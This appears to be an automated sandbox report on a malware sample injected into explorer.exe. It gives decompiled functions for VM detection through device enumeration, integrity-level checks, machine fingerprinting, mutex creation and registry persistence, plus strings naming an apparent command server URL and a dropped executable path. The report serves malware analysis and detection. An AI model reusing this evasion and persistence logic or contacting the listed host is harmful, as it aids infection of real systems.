Part of subcall function 00774408: SetSecurityDescriptorDacl.ADVAPI32(?,000000FF,00000000,00000000), ref: 00774437
Part of subcall function 00774408: ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(00771CB4,00000001,?,00000000), ref: 00774453
Part of subcall function 00774408: GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?), ref: 00774478
Part of subcall function 00774408: SetSecurityDescriptorSacl.ADVAPI32(?,?,?,?), ref: 00774498
Part of subcall function 00774408: LocalFree.KERNEL32(?), ref: 007744AC

CreateMutexA.KERNELBASE(?,00000000,00771CC8), ref: 00778DB4
LocalFree.KERNEL32(?), ref: 00778DC3

Part of subcall function 00778BFC: RegOpenKeyExA.KERNELBASE(80000002,00772174,00000000,00020119,?), ref: 00778C1B

Part of subcall function 00777984: GetVolumeInformationA.KERNELBASE(007721D0,00000000,00000000,0077B110,?,?,00000000,00000000), ref: 007779A5

Part of subcall function 007789D4: GetVolumeInformationA.KERNELBASE(007721D0,00000000,00000000,?,?,?,00000000,00000000), ref: 007789F4

Part of subcall function 00777A44: GetModuleFileNameA.KERNEL32(00000000,?,00000401), ref: 00777A67
Part of subcall function 00777A44: GetFileVersionInfoSizeA.KERNELBASE(?,?), ref: 00777A88
Part of subcall function 00777A44: GetFileVersionInfoA.KERNELBASE(?,?,00000000,?), ref: 00777AB9

RtlInitializeCriticalSection.NTDLL(0077BE04), ref: 00778E0C

Part of subcall function 007747AC: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007747D9
Part of subcall function 007747AC: CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 007747FB
Part of subcall function 007747AC: GetFileSize.KERNEL32(?,00000000), ref: 00774810
Part of subcall function 007747AC: ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0077483F
Part of subcall function 007747AC: CloseHandle.KERNEL32(?), ref: 00774849

Part of subcall function 00777304: RegOpenKeyExA.KERNELBASE(80000002,007721A4,00000000,000F003F,?), ref: 00777331
Part of subcall function 00777304: RegOpenKeyExA.ADVAPI32(80000001,007721A4,00000000,000F003F,?), ref: 00777352

Part of subcall function 0077471C: CreateThread.KERNEL32(00000000,00000000,Function_00004608,?,00000000,?), ref: 00774777
Part of subcall function 0077471C: SetThreadPriority.KERNEL32(?,000000F1), ref: 00774786
Part of subcall function 0077471C: CloseHandle.KERNEL32(?), ref: 00774790

Part of subcall function 00774A1C: RegDeleteValueA.ADVAPI32(?,?), ref: 00774A55

Part of subcall function 00778B98: SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,000000FF), ref: 00778BB2
Part of subcall function 00778B98: SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001A,000000FF), ref: 00778BD6

Part of subcall function 00778B6C: CreateThread.KERNEL32(00000000,00000000,Function_00008AA4,00000000,00000000,?), ref: 00778B81
Part of subcall function 00778B6C: CloseHandle.KERNEL32(?), ref: 00778B8E

Part of subcall function 00774BA0: GetComputerNameA.KERNEL32(?,00000101), ref: 00774BC3
Part of subcall function 00774BA0: RegOpenKeyExA.KERNELBASE(80000002,00772174,00000000,00020119,?), ref: 00774C01
Part of subcall function 00774BA0: GetVolumeInformationA.KERNELBASE(007721D0,00000000,00000000,?,?,?,00000000,00000000), ref: 00774D40

Part of subcall function 00775468: GetSystemTime.KERNEL32(?), ref: 00775472

Part of subcall function 00771440: GetProcessHeap.KERNEL32(00000000,?), ref: 0077144D
Part of subcall function 00771440: HeapFree.KERNEL32(00000000), ref: 00771454

Part of subcall function 00778064: RegOpenKeyExA.KERNELBASE(?,?,00000000,000F003F,?), ref: 0077808B
Part of subcall function 00778064: RegDeleteValueA.ADVAPI32(?,?), ref: 0077809D

Sleep.KERNELBASE(000003E8), ref: 00778FC8
GetCursorPos.USER32(?), ref: 00779000

Part of subcall function 00777474: RegCreateKeyExA.ADVAPI32(80000002,007721A4,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 0077750D
Part of subcall function 00777474: RegCreateKeyExA.ADVAPI32(80000001,007721A4,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00777533

Part of subcall function 007738DC: RtlEnterCriticalSection.NTDLL(?), ref: 007738E3

Part of subcall function 007738EC: RtlLeaveCriticalSection.NTDLL(?), ref: 007738F3

Part of subcall function 00775640: SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001A,000000FF), ref: 00775664
Part of subcall function 00775640: FindFirstFileA.KERNEL32(?,00000080), ref: 00775697
Part of subcall function 00775640: FindNextFileA.KERNEL32(000000FF,00000080), ref: 00775825
Part of subcall function 00775640: FindClose.KERNEL32(000000FF), ref: 0077583D

Part of subcall function 007784A4: Sleep.KERNEL32(00004E20), ref: 00778519
Part of subcall function 007784A4: GetTickCount.KERNEL32 ref: 007786EB
Part of subcall function 007784A4: Sleep.KERNEL32(00003A98), ref: 00778706
Part of subcall function 007784A4: RtlExitUserThread.NTDLL(00000000), ref: 00778879
Part of subcall function 007784A4: RtlExitUserThread.NTDLL(00000000), ref: 007788B6
Part of subcall function 007784A4: Sleep.KERNEL32(000003E8), ref: 0077895F

RtlExitUserThread.NTDLL(00000000), ref: 00779069

Part of subcall function 007741CC: GetCurrentThread.KERNEL32 ref: 007741DE
Part of subcall function 007741CC: OpenThreadToken.ADVAPI32(00000000), ref: 007741E5
Part of subcall function 007741CC: GetLastError.KERNEL32 ref: 007741F4
Part of subcall function 007741CC: GetCurrentProcess.KERNEL32 ref: 00774207
Part of subcall function 007741CC: OpenProcessToken.ADVAPI32(00000000), ref: 0077420E
Part of subcall function 007741CC: GetTokenInformation.ADVAPI32(?,00000002,?,00000400,?), ref: 00774241
Part of subcall function 007741CC: CloseHandle.KERNEL32(?), ref: 0077424E
Part of subcall function 007741CC: AllocateAndInitializeSid.ADVAPI32(0077A2A4,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00774278
Part of subcall function 007741CC: EqualSid.ADVAPI32(?,?), ref: 007742A2
Part of subcall function 007741CC: FreeSid.ADVAPI32(?), ref: 007742BE

Strings

ewhasskz, xrefs: 00778F68
wigermexir.com/auth/, xrefs: 00779050
C:\Program Files\Windows NT\hlpnu.exe, xrefs: 00778F0C, 00778F2D
.lnk, xrefs: 00778E8A
67D4697B4F7C08C75D, xrefs: 00778F3C

Memory Dump Source

Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_770000_explorer.jbxd

Function 00776ECE, Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 163
library

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 66%

			E00776ECE(signed char __eax, void* __ecx, void* __edx, void* __esi, char _a1) {
				intOrPtr _v4;
				void* _v8;
				void* _v12;
				struct HINSTANCE__* _v16;
				signed int _v20;
				void* _v28;
				CHAR* _v36;
				void* _v157;
				void* _v188;
				char* __ebp;
				void* _t115;

				_t115 = __ecx;
				_t57 = __eax;
				if(__esi + 1 <= 0) {
					L7:
					__eflags =  *(_t115 - 0x45ffffff) & _t57;
				} else {
					if(__eflags <= 0) {
						asm("lock lea eax, [ebp-0x209]");
						if(E00771110(__eax, _v16) != 0) {
							_v4 = 0xffffffff;
						}
						E00771440(_v16);
						return _v4;
					} else {
						asm("rol esi, 1");
						asm("sahf");
						asm("out 0x48, al");
						asm("salc");
						asm("sbb [eax], eax");
						__eax->i = __eax->i + __al;
						__dh = __dh + __al;
						asm("repne shl dl, 0x4a");
						__ebp =  &_a1;
						_push(es);
						asm("rol byte [fs:eax], 0x0");
						_push( &_a1);
						__ebp = __esp;
						__esp = __esp + 0xffffff44;
						__eax = 0;
						_v16 = 0;
						__eax =  *0x77a55c; // 0x776ed0
						_v36 = __eax;
						__eax = _v36;
						__eax = LoadLibraryA(_v36); // executed
						_v20 = __eax;
						__eax = _v36;
						__eax = E00771440(_v36);
						__eflags = _v20;
						if (_v20 == 0) goto L13;
						goto L7;
					}
				}
			}

0x00776ece
0x00776ece
0x00776ed1
0x00776f21
0x00776f21
0x00776ed3
0x00776ed3
0x00776ea5
0x00776eb6
0x00776eb8
0x00776eb8
0x00776ec2
0x00776ecd
0x00776ed5
0x00776ed5
0x00776ed7
0x00776ed8
0x00776eda
0x00776edb
0x00776edd
0x00776edf
0x00776ee1
0x00776ee6
0x00776ee7
0x00776ee8
0x00776eec
0x00776eed
0x00776eef
0x00776ef5
0x00776ef7
0x00776efa
0x00776f04
0x00776f07
0x00776f0b
0x00776f11
0x00776f14
0x00776f17
0x00776f1c
0x00776f20
0x00000000
0x00776f20
0x00776ed3

APIs

Part of subcall function 00771440: GetProcessHeap.KERNEL32(00000000,?), ref: 0077144D
Part of subcall function 00771440: HeapFree.KERNEL32(00000000), ref: 00771454

LoadLibraryA.KERNELBASE(?), ref: 00776F0B
SetupDiGetClassDevsA.SETUPAPI(0077A014,00000000,00000000,00000002), ref: 00776F79
SetupDiEnumDeviceInfo.SETUPAPI(?,?,0000001C), ref: 00776FA7
SetupDiGetDeviceRegistryPropertyA.SETUPAPI(?,0000001C,00000000,?,00000000,00000081,?), ref: 00776FCE
CharLowerBuffA.USER32(00000000,00000000), ref: 00776FE7
SetupDiDestroyDeviceInfoList.SETUPAPI(?), ref: 00776FF1
SetupDiGetClassDevsA.SETUPAPI(0077A024,00000000,00000000,00000002), ref: 00777028
SetupDiEnumDeviceInfo.SETUPAPI(?,?,0000001C), ref: 00777056
SetupDiGetDeviceRegistryPropertyA.SETUPAPI(?,0000001C,0000000C,?,00000000,00000081,?), ref: 0077707D
CharLowerBuffA.USER32(00000000,00000000), ref: 00777096
SetupDiDestroyDeviceInfoList.SETUPAPI(?), ref: 007770A0

Strings

nw, xrefs: 00776FF7

Memory Dump Source

Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_770000_explorer.jbxd

Function 00776EEC, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 131
library

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00776EEC(void* __ecx) {
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				CHAR* _v28;
				void* _v32;
				void* _v161;
				void* _v192;
				intOrPtr _t54;
				struct HINSTANCE__* _t57;

				_v8 = 0;
				_t54 =  *0x77a55c; // 0x776ed0
				_v28 = E00773F38(_t54);
				_t57 = LoadLibraryA(_v28); // executed
				_v12 = _t57;
				E00771440(_v28);
				if (_v12 == 0) goto L7;
			}

0x00776ef7
0x00776efa
0x00776f04
0x00776f0b
0x00776f11
0x00776f17
0x00776f20

APIs

LoadLibraryA.KERNELBASE(?), ref: 00776F0B

Part of subcall function 00771440: GetProcessHeap.KERNEL32(00000000,?), ref: 0077144D
Part of subcall function 00771440: HeapFree.KERNEL32(00000000), ref: 00771454

SetupDiGetClassDevsA.SETUPAPI(0077A014,00000000,00000000,00000002), ref: 00776F79
SetupDiEnumDeviceInfo.SETUPAPI(?,?,0000001C), ref: 00776FA7
SetupDiGetDeviceRegistryPropertyA.SETUPAPI(?,0000001C,00000000,?,00000000,00000081,?), ref: 00776FCE
CharLowerBuffA.USER32(00000000,00000000), ref: 00776FE7
SetupDiDestroyDeviceInfoList.SETUPAPI(?), ref: 00776FF1
SetupDiGetClassDevsA.SETUPAPI(0077A024,00000000,00000000,00000002), ref: 00777028
SetupDiEnumDeviceInfo.SETUPAPI(?,?,0000001C), ref: 00777056
SetupDiGetDeviceRegistryPropertyA.SETUPAPI(?,0000001C,0000000C,?,00000000,00000081,?), ref: 0077707D
CharLowerBuffA.USER32(00000000,00000000), ref: 00777096
SetupDiDestroyDeviceInfoList.SETUPAPI(?), ref: 007770A0

Strings

nw, xrefs: 00776FF7

Memory Dump Source

Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_770000_explorer.jbxd

Function 00778AA4, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 59
windowthreadregistry

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 91%

			E00778AA4(void* __edx, void* __eflags) {
				struct _WNDCLASSEXA _v52;
				struct tagMSG _v80;
				char _v97;
				void* _t14;
				struct HWND__* _t26;

				E00771164(E007710B4(E00771164(E007710B4(_t14, __edx),  &_v97),  &_v97),  &(( &_v97)[8]));
				E00771258( &_v52, 0x30);
				_v52.cbSize = 0x30;
				_v52.hInstance = 0;
				_v52.lpszClassName =  &_v97;
				_v52.lpfnWndProc = E00778A48;
				RegisterClassExA( &_v52);
				_t26 = CreateWindowExA(0,  &_v97, 0, 0, 0x80000000, 0x80000000, 0x80000000, 0x80000000, 0, 0, 0, 0); // executed
				 *0x77a574 = _t26;
				if( *0x77a574 != 0) {
					while(GetMessageA( &_v80, 0, 0, 0) != 0) {
						TranslateMessage( &_v80);
						DispatchMessageA( &_v80);
					}
				}
				_push(0);
				return RtlExitUserThread();
			}

0x00778ac2
0x00778acf
0x00778ad4
0x00778add
0x00778ae3
0x00778ae6
0x00778af1
0x00778b1d
0x00778b23
0x00778b2f
0x00778b47
0x00778b37
0x00778b41
0x00778b41
0x00778b47
0x00778b5b
0x00778b66

APIs

RegisterClassExA.USER32(00000030), ref: 00778AF1
CreateWindowExA.USER32(00000000,?,00000000,00000000,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00778B1D
TranslateMessage.USER32(?), ref: 00778B37
DispatchMessageA.USER32(?), ref: 00778B41
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00778B51
RtlExitUserThread.NTDLL(00000000), ref: 00778B5D

Strings

0, xrefs: 00778AD4

Memory Dump Source

Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_770000_explorer.jbxd

Function 007742D4, Relevance: 10.6, APIs: 7, Instructions: 101

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 88%

			E007742D4(void* __eax) {
				void* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v20;
				long _v24;
				void** _v28;
				intOrPtr _v32;
				char* _v36;
				intOrPtr* _v40;
				signed int _t40;
				signed int _t47;
				signed int _t59;

				_v8 = __eax;
				_v16 = 0;
				_t40 = OpenProcessToken(_v8, 8,  &_v20);
				asm("sbb eax, eax");
				if( ~( ~_t40) == 0) {
					L17:
					_v12 = _v16;
					return _v12;
				}
				_t47 = GetTokenInformation(_v20, 0x19, 0, 0,  &_v24); // executed
				asm("sbb eax, eax");
				if( ~( ~_t47) != 0 || GetLastError() != 0x7a) {
					L16:
					CloseHandle(_v20);
					goto L17;
				} else {
					_v28 = E007713DC(_v24);
					if(_v28 == 0) {
						goto L16;
					}
					_t59 = GetTokenInformation(_v20, 0x19, _v28, _v24,  &_v24); // executed
					asm("sbb eax, eax");
					if( ~( ~_t59) != 0) {
						_v36 = GetSidSubAuthorityCount( *_v28);
						if(_v36 != 0 &&  *_v36 > 0) {
							_v40 = GetSidSubAuthority( *_v28, ( *_v36 & 0x000000ff) - 1);
							if(_v40 != 0) {
								_v32 =  *_v40;
								if(_v32 >= 0x2000) {
									if(_v32 < 0x2000 || _v32 >= 0x3000) {
										if(_v32 >= 0x3000) {
											_v16 = 3;
										}
									} else {
										_v16 = 2;
									}
								} else {
									_v16 = 1;
								}
							}
						}
					}
					E00771440(_v28);
					goto L16;
				}
			}

0x007742da
0x007742df
0x007742ec
0x007742f4
0x007742fa
0x007743f9
0x007743fc
0x00774405
0x00774405
0x0077430e
0x00774316
0x0077431c
0x007743ef
0x007743f3
0x00000000
0x00774331
0x00774339
0x00774340
0x00000000
0x00000000
0x00774358
0x00774360
0x00774366
0x00774374
0x0077437b
0x00774399
0x007743a0
0x007743a7
0x007743b1
0x007743c3
0x007743de
0x007743e0
0x007743e0
0x007743ce
0x007743ce
0x007743ce
0x007743b3
0x007743b3
0x007743b3
0x007743b1
0x007743a0
0x0077437b
0x007743ea
0x00000000
0x007743ea

APIs

OpenProcessToken.ADVAPI32(?,00000008,?), ref: 007742EC
GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 0077430E
GetLastError.KERNEL32 ref: 00774322

Part of subcall function 007713DC: GetProcessHeap.KERNEL32(00000000,?), ref: 007713EB
Part of subcall function 007713DC: RtlAllocateHeap.NTDLL(00000000), ref: 007713F2

GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,?,?), ref: 00774358
GetSidSubAuthorityCount.ADVAPI32(?), ref: 0077436E
GetSidSubAuthority.ADVAPI32(?,?), ref: 00774393

Part of subcall function 00771440: GetProcessHeap.KERNEL32(00000000,?), ref: 0077144D
Part of subcall function 00771440: HeapFree.KERNEL32(00000000), ref: 00771454

CloseHandle.KERNEL32(?), ref: 007743F3

Memory Dump Source

Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_770000_explorer.jbxd

Function 00774408, Relevance: 9.1, APIs: 6, Instructions: 85

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 64%

			E00774408(intOrPtr* __eax, struct _SECURITY_DESCRIPTOR* __edx) {
				intOrPtr* _v8;
				struct _SECURITY_DESCRIPTOR* _v12;
				struct _ACL* _v16;
				void* _v20;
				int _v24;
				int _v28;
				struct _ACL* _v32;
				intOrPtr _t37;
				signed int _t38;
				signed int _t50;
				signed int _t59;

				_v12 = __edx;
				_v8 = __eax;
				_v16 = 0;
				if(InitializeSecurityDescriptor(_v12, 1) != 0 && SetSecurityDescriptorDacl(_v12, 0xffffffff, 0, 0) != 0) {
					_t37 =  *0x77a0d4; // 0x771cb4
					_t38 =  *0x77b32c(_t37, 1,  &_v20, 0); // executed
					asm("sbb eax, eax");
					if( ~( ~_t38) == 0) {
						_v20 = 0xffffffff;
					} else {
						_v32 = 0;
						_t50 = GetSecurityDescriptorSacl(_v20,  &_v24,  &_v32,  &_v28);
						asm("sbb eax, eax");
						if( ~( ~_t50) == 0) {
							L5:
							LocalFree(_v20);
							_v20 = 0xffffffff;
						} else {
							_t59 = SetSecurityDescriptorSacl(_v12, _v24, _v32, _v28);
							asm("sbb eax, eax");
							if( ~( ~_t59) == 0) {
								goto L5;
							}
						}
					}
					if(_v8 != 0) {
						 *_v8 = 0xc;
						 *(_v8 + 4) = _v12;
						 *((intOrPtr*)(_v8 + 8)) = 0;
					}
					_v16 = _v20;
				}
				return _v16;
			}

0x0077440e
0x00774411
0x00774416
0x00774427
0x0077444d
0x00774453
0x0077445b
0x00774461
0x007744bb
0x00774463
0x00774465
0x00774478
0x00774480
0x00774486
0x007744a8
0x007744ac
0x007744b2
0x00774488
0x00774498
0x007744a0
0x007744a6
0x00000000
0x00000000
0x007744a6
0x00774486
0x007744c6
0x007744cb
0x007744d7
0x007744df
0x007744df
0x007744e5
0x007744e5
0x007744ee

APIs

InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 0077441F
SetSecurityDescriptorDacl.ADVAPI32(?,000000FF,00000000,00000000), ref: 00774437
ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(00771CB4,00000001,?,00000000), ref: 00774453
GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?), ref: 00774478
SetSecurityDescriptorSacl.ADVAPI32(?,?,?,?), ref: 00774498
LocalFree.KERNEL32(?), ref: 007744AC

Memory Dump Source

Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_770000_explorer.jbxd

Function 00774406, Relevance: 9.1, APIs: 6, Instructions: 85

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 64%

			E00774406(intOrPtr* __eax, struct _SECURITY_DESCRIPTOR* __edx) {
				intOrPtr* _v8;
				struct _SECURITY_DESCRIPTOR* _v12;
				struct _ACL* _v16;
				void* _v20;
				int _v24;
				int _v28;
				struct _ACL* _v32;
				intOrPtr _t37;
				signed int _t38;
				signed int _t50;
				signed int _t59;

				_v12 = __edx;
				_v8 = __eax;
				_v16 = 0;
				if(InitializeSecurityDescriptor(_v12, 1) != 0 && SetSecurityDescriptorDacl(_v12, 0xffffffff, 0, 0) != 0) {
					_t37 =  *0x77a0d4; // 0x771cb4
					_t38 =  *0x77b32c(_t37, 1,  &_v20, 0); // executed
					asm("sbb eax, eax");
					if( ~( ~_t38) == 0) {
						_v20 = 0xffffffff;
					} else {
						_v32 = 0;
						_t50 = GetSecurityDescriptorSacl(_v20,  &_v24,  &_v32,  &_v28);
						asm("sbb eax, eax");
						if( ~( ~_t50) == 0) {
							L6:
							LocalFree(_v20);
							_v20 = 0xffffffff;
						} else {
							_t59 = SetSecurityDescriptorSacl(_v12, _v24, _v32, _v28);
							asm("sbb eax, eax");
							if( ~( ~_t59) == 0) {
								goto L6;
							}
						}
					}
					if(_v8 != 0) {
						 *_v8 = 0xc;
						 *(_v8 + 4) = _v12;
						 *((intOrPtr*)(_v8 + 8)) = 0;
					}
					_v16 = _v20;
				}
				return _v16;
			}

APIs

InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 0077441F
SetSecurityDescriptorDacl.ADVAPI32(?,000000FF,00000000,00000000), ref: 00774437
ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(00771CB4,00000001,?,00000000), ref: 00774453
GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?), ref: 00774478
SetSecurityDescriptorSacl.ADVAPI32(?,?,?,?), ref: 00774498
LocalFree.KERNEL32(?), ref: 007744AC

Memory Dump Source

Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_770000_explorer.jbxd

Function 00777A44, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 120

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E00777A44(void* __ecx) {
				int _v8;
				int _v12;
				void* _v16;
				char _v20;
				char _v24;
				intOrPtr _v28;
				char _v1053;
				char _v1074;
				int _t44;
				int _t51;
				void* _t91;

				_t91 = __ecx;
				_v8 = 0;
				 *0x77b00c = 0;
				GetModuleFileNameA(0,  &_v1053, 0x401);
				E007748DC( &_v1053, _t91, 0x77b00c);
				_t44 = GetFileVersionInfoSizeA( &_v1053,  &_v12); // executed
				_v12 = _t44;
				if(_v12 != 0) {
					_v16 = E007713DC(_v12);
					_t51 = GetFileVersionInfoA( &_v1053, _v8, _v12, _v16); // executed
					if(_t51 != 0) {
						_v24 = 0x34;
						 *0x77b298(_v16, E00777BFC,  &_v20,  &_v24);
						_v28 = _v20;
						E0077133C("explorer 10.0.10586.104", 0x777c00);
						E00771864(E00771884( *(_v28 + 0x10)) & 0x0000ffff,  &_v1074);
						E0077133C("explorer 10.0.10586.104",  &_v1074);
						E0077133C("explorer 10.0.10586.104", 0x777c04);
						E00771864( *(_v28 + 0x10) & 0x0000ffff,  &_v1074);
						E0077133C("explorer 10.0.10586.104",  &_v1074);
						E0077133C("explorer 10.0.10586.104", 0x777c04);
						E00771864(E00771884( *(_v28 + 0x14)) & 0x0000ffff,  &_v1074);
						E0077133C("explorer 10.0.10586.104",  &_v1074);
						E0077133C("explorer 10.0.10586.104", 0x777c04);
						E00771864( *(_v28 + 0x14) & 0x0000ffff,  &_v1074);
						E0077133C("explorer 10.0.10586.104",  &_v1074);
					}
					return E00771440(_v16);
				}
				return _t44;
			}

0x00777a44
0x00777a4f
0x00777a52
0x00777a67
0x00777a78
0x00777a88
0x00777a8e
0x00777a95
0x00777aa3
0x00777ab9
0x00777ac1
0x00777ac7
0x00777adf
0x00777ae8
0x00777af5
0x00777b13
0x00777b27
0x00777b39
0x00777b50
0x00777b64
0x00777b76
0x00777b94
0x00777ba8
0x00777bba
0x00777bd1
0x00777be5
0x00777bea
0x00000000
0x00777bf0
0x00777bf8

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000401), ref: 00777A67
GetFileVersionInfoSizeA.KERNELBASE(?,?), ref: 00777A88

Part of subcall function 007713DC: GetProcessHeap.KERNEL32(00000000,?), ref: 007713EB
Part of subcall function 007713DC: RtlAllocateHeap.NTDLL(00000000), ref: 007713F2

GetFileVersionInfoA.KERNELBASE(?,?,00000000,?), ref: 00777AB9

Part of subcall function 00771440: GetProcessHeap.KERNEL32(00000000,?), ref: 0077144D
Part of subcall function 00771440: HeapFree.KERNEL32(00000000), ref: 00771454

Part of subcall function 00771864: wsprintfA.USER32 ref: 00771874

Strings

4, xrefs: 00777AC7
explorer 10.0.10586.104, xrefs: 00777A52, 00777A6D, 00777AF0, 00777B22, 00777B34, 00777B5F, 00777B71, 00777BA3, 00777BB5, 00777BE0

Memory Dump Source

Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_770000_explorer.jbxd

Function 007747AC, Relevance: 7.6, APIs: 5, Instructions: 64
file

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E007747AC(CHAR* __eax, void** __edx) {
				CHAR* _v8;
				void** _v12;
				long _v16;
				void* _v20;
				long _v24;
				long _v28;
				void* _t27;

				_v12 = __edx;
				_v8 = __eax;
				_v16 = 0xffffffff;
				 *_v12 = 0;
				_t27 = CreateFileA(_v8, 0x80000000, 1, 0, 3, 0, 0); // executed
				_v20 = _t27;
				if(_v20 == 0xffffffff) {
					_v20 = CreateFileA(_v8, 0x80000000, 0, 0, 3, 0, 0);
				}
				if(_v20 != 0xffffffff) {
					_v24 = GetFileSize(_v20, 0);
					if(_v24 != 0) {
						E007713B4(_v12, _v24 + 1); // executed
						ReadFile(_v20,  *_v12, _v24,  &_v28, 0); // executed
						CloseHandle(_v20);
						_v16 = _v24;
					}
				}
				return _v16;
			}

0x007747b2
0x007747b5
0x007747b8
0x007747c4
0x007747d9
0x007747df
0x007747e6
0x00774801
0x00774801
0x00774808
0x00774816
0x0077481d
0x00774826
0x0077483f
0x00774849
0x00774852
0x00774852
0x0077481d
0x0077485b

APIs

CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007747D9
CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 007747FB
GetFileSize.KERNEL32(?,00000000), ref: 00774810

Part of subcall function 007713B4: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 007713CD

ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0077483F
CloseHandle.KERNEL32(?), ref: 00774849

Memory Dump Source

Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_770000_explorer.jbxd

Function 00774BA0, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 176
registry

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00774BA0(intOrPtr* __eax) {
				intOrPtr* _v8;
				long _v12;
				long _v16;
				signed int _v20;
				long _v24;
				long _v28;
				signed int _v32;
				void* _v36;
				void* _v40;
				signed int _v41;
				char _v298;
				char* _t78;
				intOrPtr _t82;
				void* _t84;
				intOrPtr _t87;
				void* _t89;
				intOrPtr _t92;
				void* _t94;
				intOrPtr _t98;
				CHAR* _t109;

				_v8 = __eax;
				_v16 = 0;
				_v12 = 0x101;
				if(GetComputerNameA( &_v298,  &_v12) != 0) {
					_v16 = E00771BA8(_v16, E007712DC( &_v298),  &_v298);
				}
				_t78 =  *0x77a25c; // 0x772174
				RegOpenKeyExA(0x80000002, _t78, 0, 0x20119,  &_v36); // executed
				_v12 = 0x101;
				_t82 =  *0x77a0e4; // 0x771d14
				_t84 = E007738B0(_v36, _t82, 0, 0,  &_v298,  &_v12); // executed
				if(_t84 == 0) {
					_v16 = E00771BA8(_v16, E007712DC( &_v298),  &_v298);
				}
				_v12 = 0x101;
				_t87 =  *0x77a0e8; // 0x771d20
				_t89 = E007738B0(_v36, _t87, 0, 0,  &_v298,  &_v12); // executed
				if(_t89 == 0) {
					_v16 = E00771BA8(_v16, E007712DC( &_v298),  &_v298);
				}
				_v12 = 0x101;
				_t92 =  *0x77a0ec; // 0x771d2c
				_t94 = E007738B0(_v36, _t92, 0, 0,  &_v298,  &_v12); // executed
				if(_t94 == 0) {
					_v16 = E00771BA8(_v16, E007712DC( &_v298),  &_v298);
				}
				_v12 = 4;
				_v20 = 0;
				_t98 =  *0x77a0f0; // 0x771d3c
				E007738B0(_v36, _t98, 0, 0,  &_v20,  &_v12); // executed
				E00773890(_v36);
				_v12 = 0;
				_v28 = 0;
				_v24 = 0;
				_t109 =  *0x77a268; // 0x7721d0
				GetVolumeInformationA(_t109, 0, 0,  &_v28,  &_v12,  &_v24, 0, 0); // executed
				_v32 = _v20 ^ _v28 ^ _v24;
				E00771164(_v32,  &_v298);
				E00771308(_v8,  &_v298);
				E00771164(_v16,  &_v298);
				E0077133C(_v8,  &_v298);
				_v40 = _v8;
				_v41 = 0;
				while( *_v40 != 0) {
					_v41 = _v41 ^ E0077118C( *_v40);
					_v40 = _v40 + 2;
				}
				E00771164(_v41,  &_v298);
				return E0077133C(_v8,  &(( &_v298)[6]));
			}

0x00774ba9
0x00774bae
0x00774bb1
0x00774bcb
0x00774be8
0x00774be8
0x00774bf6
0x00774c01
0x00774c07
0x00774c1d
0x00774c27
0x00774c31
0x00774c4e
0x00774c4e
0x00774c51
0x00774c67
0x00774c71
0x00774c7b
0x00774c98
